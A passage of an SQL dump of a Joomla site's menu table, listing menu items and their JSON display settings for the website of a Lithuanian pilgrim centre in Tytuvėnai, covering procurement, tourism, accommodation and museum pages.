pirkimai','2014-04-10-06-12-19','','viesieji-pirkimai/2014-04-10-06-12-19','http://www.cvpp.lt/index.php?option=com_vpt&Itemid=63&task=search&theme=new&vpt_united=%C4%AEveskite+paie%C5%A1kos+kriterij%C5%B3...&button=&vpt_company=Tytuv%C4%97n%C5%B3+piligrim%C5%B3+centras&vpt_noticetype=0&vpt_jarcode=&vpt_proceduretype=0&vpt_object','url',-2,268,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',246,247,0,'*',0),(271,'mainmenu','Mažos vertės pirkimai','mazos-vertes-pirkimai','','viesieji-pirkimai/mazos-vertes-pirkimai','index.php?option=com_content&view=article&id=96','component',-2,268,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',248,249,0,'*',0),(272,'mainmenu','Turizmas','turizmas','','turizmas','index.php?option=com_content&view=category&id=52','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"0\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"0\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',251,252,0,'*',0),(273,'mainmenu','Parama','parama','','parama','index.php?option=com_content&view=article&id=184','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',253,254,0,'*',0),(274,'mainmenu','Struktūra ir kontaktai','kontaktai','','kontaktai','index.php?option=com_content&view=article&id=94','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',171,172,0,'*',0),(275,'mainmenu','Galerija','galerija','','galerija','index.php?option=com_content&view=article&id=185','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',255,256,0,'*',0),(276,'mainmenu','Projektai','projektai','','projektai','index.php?option=com_content&view=category&id=57','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"0\",\"filter_field\":\"hide\",\"show_headings\":\"0\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"0\",\"list_show_author\":\"0\",\"orderby_pri\":\"\",\"orderby_sec\":\"date\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',135,146,0,'*',0),(277,'mainmenu','Paslaugos ir kainos','paslaugos','','apie-centra/paslaugos','index.php?option=com_content&view=article&id=178','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',52,53,0,'*',0),(278,'mainmenu','Ekskursijos','ekskursijos','','apie-centra/ekskursijos','index.php?option=com_content&view=article&id=179','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',54,55,0,'*',0),(279,'mainmenu','Edukacinės programos','edukacines-programos','','apie-centra/edukacines-programos','index.php?option=com_content&view=article&id=183','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',56,57,0,'*',0),(280,'mainmenu','Suvenyrai','suvenyrai','','apie-centra/suvenyrai','index.php?option=com_content&view=article&id=180','component',0,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',58,59,0,'*',0),(281,'mainmenu','Įstatai','istatai','','apie-centra/istatai','index.php?option=com_content&view=article&id=176','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',60,61,0,'*',0),(282,'mainmenu','Darbo užmokestis','darbo-uzmokestis','','apie-centra/darbo-uzmokestis','index.php?option=com_content&view=article&id=177','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',62,63,0,'*',0),(283,'mainmenu','Veiklos strategija','veiklos-strategija','','apie-centra/veiklos-strategija','index.php?option=com_content&view=article&id=182','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',64,65,0,'*',0),(284,'mainmenu','Viešieji pirkimai','viesieji-pirkimai','','apie-centra/viesieji-pirkimai','index.php?option=com_content&view=article&id=95','component',0,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',66,73,0,'*',0),(285,'mainmenu','Parama','parama','','apie-centra/parama','index.php?option=com_content&view=article&id=184','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',74,75,0,'*',0),(286,'mainmenu','Pasiūlymai','pasiulymai','','pasiulymai','index.php?option=com_content&view=article&id=186','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',83,84,0,'*',0),(287,'mainmenu','Turizmas','turizmo-informacija','','turizmo-informacija','index.php?option=com_content&view=article&id=175','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',85,112,0,'*',0),(288,'mainmenu','Maitinimas','maitinimas','','maitinimas','index.php?option=com_content&view=article&id=174','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',113,118,0,'*',0),(289,'mainmenu','Apgyvendinimas','apgyvendinimas','','apgyvendinimas','index.php?option=com_content&view=article&id=164','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',119,126,0,'*',0),(290,'mainmenu','Lankytini objektai','lankytini-objektai','','lankytini-objektai','index.php?option=com_k2&view=itemlist&layout=tag','separator',1,1,1,10048,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',127,134,0,'*',0),(291,'mainmenu','Lankytini objektai','kulturos-paveldo-objektai','','lankytini-objektai/kulturos-paveldo-objektai','index.php?option=com_content&view=article&id=173','component',1,290,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',128,129,0,'*',0),(292,'mainmenu','Muziejai','muziejai','','lankytini-objektai/muziejai','index.php?option=com_content&view=article&id=187','component',1,290,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',130,131,0,'*',0),(293,'mainmenu','Gamtos paminklai','gamtos-paminklai','','lankytini-objektai/gamtos-paminklai','index.php?option=com_content&view=article&id=188','component',-2,290,2,22,0,0,'0000-00-00 